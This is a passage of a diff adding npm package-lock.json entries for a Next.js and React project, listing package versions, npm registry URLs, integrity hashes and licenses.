"sha512-0nnMyoyOLRJXfbMOilaSRcLH3Jw5z9HDNGfT/gwCPgaDjnx0i8w7vBzFLFR1f6CMLKF8gVbebmkUN3fa/kQJpQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-arm64-musl": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-linux-arm64-musl/-/lightningcss-linux-arm64-musl-1.32.0.tgz", + "integrity": "sha512-UpQkoenr4UJEzgVIYpI80lDFvRmPVg6oqboNHfoH4CQIfNA+HOrZ7Mo7KZP02dC6LjghPQJeBsvXhJod/wnIBg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-x64-gnu": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-linux-x64-gnu/-/lightningcss-linux-x64-gnu-1.32.0.tgz", + "integrity": "sha512-V7Qr52IhZmdKPVr+Vtw8o+WLsQJYCTd8loIfpDaMRWGUZfBOYEJeyJIkqGIDMZPwPx24pUMfwSxxI8phr/MbOA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-linux-x64-musl": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-linux-x64-musl/-/lightningcss-linux-x64-musl-1.32.0.tgz", + "integrity": "sha512-bYcLp+Vb0awsiXg/80uCRezCYHNg1/l3mt0gzHnWV9XP1W5sKa5/TCdGWaR/zBM2PeF/HbsQv/j2URNOiVuxWg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-win32-arm64-msvc": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-win32-arm64-msvc/-/lightningcss-win32-arm64-msvc-1.32.0.tgz", + "integrity": "sha512-8SbC8BR40pS6baCM8sbtYDSwEVQd4JlFTOlaD3gWGHfThTcABnNDBda6eTZeqbofalIJhFx0qKzgHJmcPTnGdw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/lightningcss-win32-x64-msvc": { + "version": "1.32.0", + "resolved": "https://registry.npmjs.org/lightningcss-win32-x64-msvc/-/lightningcss-win32-x64-msvc-1.32.0.tgz", + "integrity": "sha512-Amq9B/SoZYdDi1kFrojnoqPLxYhQ4Wo5XiL8EVJrVsB8ARoC1PWW6VGtT0WKCemjy8aC+louJnjS7U18x3b06Q==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MPL-2.0", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 12.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/parcel" + } + }, + "node_modules/locate-path": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", + "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", + "dev": true, + "license": "MIT", + "dependencies": { + "p-locate": "^5.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/lodash.merge": { + "version": "4.6.2", + "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", + "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/loose-envify": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz", + "integrity": "sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "js-tokens": "^3.0.0 || ^4.0.0" + }, + "bin": { + "loose-envify": "cli.js" + } + }, + "node_modules/magic-string": { + "version": "0.30.21", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz", + "integrity": "sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.5" + } + }, + "node_modules/math-intrinsics": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz", + "integrity": "sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/merge2": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", + "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 8" + } + }, + "node_modules/micromatch": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", + "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", + "dev": true, + "license": "MIT", + "dependencies": { + "braces": "^3.0.3", + "picomatch": "^2.3.1" + }, + "engines": { + "node": ">=8.6" + } + }, + "node_modules/minimatch": { + "version": "3.1.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", + "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "dev": true, + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dev": true, + "license": "MIT" + }, + "node_modules/nanoid": { + "version": "3.3.11", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz", + "integrity": "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "bin": { + "nanoid": "bin/nanoid.cjs" + }, + "engines": { + "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1" + } + }, + "node_modules/napi-postinstall": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/napi-postinstall/-/napi-postinstall-0.3.4.tgz", + "integrity": "sha512-PHI5f1O0EP5xJ9gQmFGMS6IZcrVvTjpXjz7Na41gTE7eE2hK11lg04CECCYEEjdc17EV4DO+fkGEtt7TpTaTiQ==", + "dev": true, + "license": "MIT", + "bin": { + "napi-postinstall": "lib/cli.js" + }, + "engines": { + "node": "^12.20.0 || ^14.18.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/napi-postinstall" + } + }, + "node_modules/natural-compare": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", + "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", + "dev": true, + "license": "MIT" + }, + "node_modules/next": { + "version": "15.5.15", + "resolved": "https://registry.npmjs.org/next/-/next-15.5.15.tgz", + "integrity": "sha512-VSqCrJwtLVGwAVE0Sb/yikrQfkwkZW9p+lL/J4+xe+G3ZA+QnWPqgcfH1tDUEuk9y+pthzzVFp4L/U8JerMfMQ==", + "license": "MIT", + "dependencies": { + "@next/env": "15.5.15", + "@swc/helpers": "0.5.15", + "caniuse-lite": "^1.0.30001579", + "postcss": "8.4.31", + "styled-jsx": "5.1.6" + }, + "bin": { + "next": "dist/bin/next" + }, + "engines": { + "node": "^18.18.0 || ^19.8.0 || >= 20.0.0" + }, + "optionalDependencies": { + "@next/swc-darwin-arm64": "15.5.15", + "@next/swc-darwin-x64": "15.5.15", + "@next/swc-linux-arm64-gnu": "15.5.15", + "@next/swc-linux-arm64-musl": "15.5.15", + "@next/swc-linux-x64-gnu": "15.5.15", + "@next/swc-linux-x64-musl": "15.5.15", + "@next/swc-win32-arm64-msvc": "15.5.15", + "@next/swc-win32-x64-msvc": "15.5.15", + "sharp": "^0.34.3" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.1.0", + "@playwright/test": "^1.51.1", + "babel-plugin-react-compiler": "*", + "react": "^18.2.0 || 19.0.0-rc-de68d2f4-20241204 || ^19.0.0", + "react-dom": "^18.2.0 || 19.0.0-rc-de68d2f4-20241204 || ^19.0.0", + "sass": "^1.3.0" + }, + "peerDependenciesMeta": { + "@opentelemetry/api": { + "optional": true + }, + "@playwright/test": { + "optional": true + }, + "babel-plugin-react-compiler": { + "optional": true + }, + "sass": { + "optional": true + } + } + }, + "node_modules/node-exports-info": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/node-exports-info/-/node-exports-info-1.6.0.tgz", + "integrity": "sha512-pyFS63ptit/P5WqUkt+UUfe+4oevH+bFeIiPPdfb0pFeYEu/1ELnJu5l+5EcTKYL5M7zaAa7S8ddywgXypqKCw==", + "dev": true, + "license": "MIT", + "dependencies": { + "array.prototype.flatmap": "^1.3.3", + "es-errors": "^1.3.0", + "object.entries": "^1.1.9", + "semver": "^6.3.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/node-exports-info/node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/object-assign": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", + "integrity": "sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/object-inspect": { + "version": "1.13.4", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz", + "integrity": "sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-keys": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/object-keys/-/object-keys-1.1.1.tgz", + "integrity": "sha512-NuAESUOUMrlIXOfHKzD6bpPu3tYt3xvjNdRIQ+FeT0lNb4K8WR70CaDxhuNguS2XG+GjkyMwOzsN5ZktImfhLA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.assign": { + "version": "4.1.7", + "resolved": "https://registry.npmjs.org/object.assign/-/object.assign-4.1.7.tgz", + "integrity": "sha512-nK28WOo+QIjBkDduTINE4JkF/UJJKyf2EJxvJKfblDpyg0Q+pkOHNTL0Qwy6NP6FhE/EnzV73BxxqcJaXY9anw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.3", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0", + "has-symbols": "^1.1.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.entries": { + "version": "1.1.9", + "resolved": "https://registry.npmjs.org/object.entries/-/object.entries-1.1.9.tgz", + "integrity": "sha512-8u/hfXFRBD1O0hPUjioLhoWFHRmt6tKA4/vZPyckBr18l1KE9uHrFaFaUi8MDRTpi4uak2goyPTSNJLXX2k2Hw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.4", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.fromentries": { + "version": "2.0.8", + "resolved": "https://registry.npmjs.org/object.fromentries/-/object.fromentries-2.0.8.tgz", + "integrity": "sha512-k6E21FzySsSK5a21KRADBd/NGneRegFO5pLHfdQLpRDETUNJueLXs3WCzyQ3tFRDYgbq3KHGXfTbi2bs8WQ6rQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.2", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object.groupby": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/object.groupby/-/object.groupby-1.0.3.tgz", + "integrity": "sha512-+Lhy3TQTuzXI5hevh8sBGqbmurHbbIjAi0Z4S63nthVLmLxfbj4T54a4CfZrXIrt9iP4mVAPYMo/v99taj3wjQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.values": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/object.values/-/object.values-1.2.1.tgz", + "integrity": "sha512-gXah6aZrcUxjWg2zR2MwouP2eHlCBzdV4pygudehaKXSGW4v2AsRQUK+lwwXhii6KFZcunEnmSUoYp5CXibxtA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "call-bound": "^1.0.3", + "define-properties": "^1.2.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/optionator": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.4.tgz", + "integrity": "sha512-6IpQ7mKUxRcZNLIObR0hz7lxsapSSIYNZJwXPGeF0mTVqGKFIXj1DQcMoT22S3ROcLyY/rz0PWaWZ9ayWmad9g==", + "dev": true, + "license": "MIT", + "dependencies": { + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0", + "word-wrap": "^1.2.5" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/own-keys": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/own-keys/-/own-keys-1.0.1.tgz", + "integrity": "sha512-qFOyK5PjiWZd+QQIh+1jhdb9LpxTF0qs7Pm8o5QHYZ0M3vKqSqzsZaEB6oWlxZ+q2sJBMI/Ktgd2N5ZwQoRHfg==", + "dev": true, + "license": "MIT", + "dependencies": { + "get-intrinsic": "^1.2.6", + "object-keys": "^1.1.1", + "safe-push-apply": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/p-limit": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", + "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "yocto-queue": "^0.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/p-locate": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", + "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", + "dev": true, + "license": "MIT", + "dependencies": { + "p-limit": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/parent-module": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", + "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", + "dev": true, + "license": "MIT", + "dependencies": { + "callsites": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-parse": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", + "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", + "dev": true, + "license": "MIT" + }, + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "license": "ISC" + }, + "node_modules/picomatch": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz", + "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/possible-typed-array-names": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/possible-typed-array-names/-/possible-typed-array-names-1.1.0.tgz", + "integrity": "sha512-/+5VFTchJDoVj3bhoqi6UeymcD00DAwb1nJwamzPvHEszJ4FpF6SNNbUbOS8yI56qHzdV8eK0qEfOSiodkTdxg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/postcss": { + "version": "8.4.31", + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz", + "integrity": "sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==", + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/postcss" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ], + "license": "MIT", + "dependencies": { + "nanoid": "^3.3.6", + "picocolors": "^1.0.0", + "source-map-js": "^1.0.2" + }, + "engines": { + "node": "^10 || ^12 || >=14" + } + }, + "node_modules/prelude-ls": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", + "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/prop-types": { + "version": "15.8.1", + "resolved": "https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz", + "integrity": "sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==", + "dev": true, + "license": "MIT", + "dependencies": { + "loose-envify": "^1.4.0", + "object-assign": "^4.1.1", + "react-is": "^16.13.1" + } + }, + "node_modules/punycode": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6" + } + }, + "node_modules/queue-microtask": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", + "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT" + }, + "node_modules/react": { + "version": "19.2.5", + "resolved": "https://registry.npmjs.org/react/-/react-19.2.5.tgz", + "integrity": "sha512-llUJLzz1zTUBrskt2pwZgLq59AemifIftw4aB7JxOqf1HY2FDaGDxgwpAPVzHU1kdWabH7FauP4i1oEeer2WCA==", + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/react-dom": { + "version": "19.2.5", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-19.2.5.tgz", + "integrity": "sha512-J5bAZz+DXMMwW/wV3xzKke59Af6CHY7G4uYLN1OvBcKEsWOs4pQExj86BBKamxl/Ik5bx9whOrvBlSDfWzgSag==", + "license": "MIT", + "dependencies": { + "scheduler": "^0.27.0" + }, + "peerDependencies": { + "react": "^19.2.5" + } + }, + "node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/reflect.getprototypeof": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/reflect.getprototypeof/-/reflect.getprototypeof-1.0.10.tgz", + "integrity": "sha512-00o4I+DVrefhv+nX0ulyi3biSHCPDe+yLv5o/p6d/UVlirijB8E16FtfwSAi4g3tcqrQ4lRAqQSoFEZJehYEcw==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.9", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.0.0", + "get-intrinsic": "^1.2.7", + "get-proto": "^1.0.1", + "which-builtin-type": "^1.2.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/regexp.prototype.flags": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/regexp.prototype.flags/-/regexp.prototype.flags-1.5.4.tgz", + "integrity": "sha512-dYqgNSZbDwkaJ2ceRd9ojCGjBq+mOm9LmtXnAnEGyHhN/5R7iDW2TRw3h+o/jCFxus3P2LfWIIiwowAjANm7IA==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.8", + "define-properties": "^1.2.1", + "es-errors": "^1.3.0", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "set-function-name": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/resolve": { + "version": "2.0.0-next.6", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-2.0.0-next.6.tgz", + "integrity": "sha512-3JmVl5hMGtJ3kMmB3zi3DL25KfkCEyy3Tw7Gmw7z5w8M9WlwoPFnIvwChzu1+cF3iaK3sp18hhPz8ANeimdJfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "is-core-module": "^2.16.1", + "node-exports-info": "^1.6.0", + "object-keys": "^1.1.1", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/resolve-from": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", + "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=4" + } + }, + "node_modules/resolve-pkg-maps": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/resolve-pkg-maps/-/resolve-pkg-maps-1.0.0.tgz", + "integrity": "sha512-seS2Tj26TBVOC2NIc2rOe2y2ZO7efxITtLZcGSOnHHNOQ7CkiUBfw0Iw2ck6xkIhPwLhKNLS8BO+hEpngQlqzw==", + "dev": true, + "license": "MIT", + "funding": { + "url": "https://github.com/privatenumber/resolve-pkg-maps?sponsor=1" + } + }, + "node_modules/reusify": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.1.0.tgz", + "integrity": "sha512-g6QUff04oZpHs0eG5p83rFLhHeV00ug/Yf9nZM6fLeUrPguBTkTQOdpAWWspMh55TZfVQDPaN3NQJfbVRAxdIw==", + "dev": true, + "license": "MIT", + "engines": { + "iojs": ">=1.0.0", + "node": ">=0.10.0" + } + }, + "node_modules/run-parallel": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", + "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "queue-microtask": "^1.2.2" + } + }, + "node_modules/safe-array-concat": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/safe-array-concat/-/safe-array-concat-1.1.4.tgz", + "integrity": "sha512-wtZlHyOje6OZTGqAoaDKxFkgRtkF9CnHAVnCHKfuj200wAgL+bSJhdsCD2l0Qx/2ekEXjPWcyKkfGb5CPboslg==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.9", + "call-bound": "^1.0.4", + "get-intrinsic": "^1.3.0", + "has-symbols": "^1.1.0", + "isarray": "^2.0.5" + }, + "engines": { + "node": ">=0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/safe-push-apply": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/safe-push-apply/-/safe-push-apply-1.0.0.tgz", + "integrity": 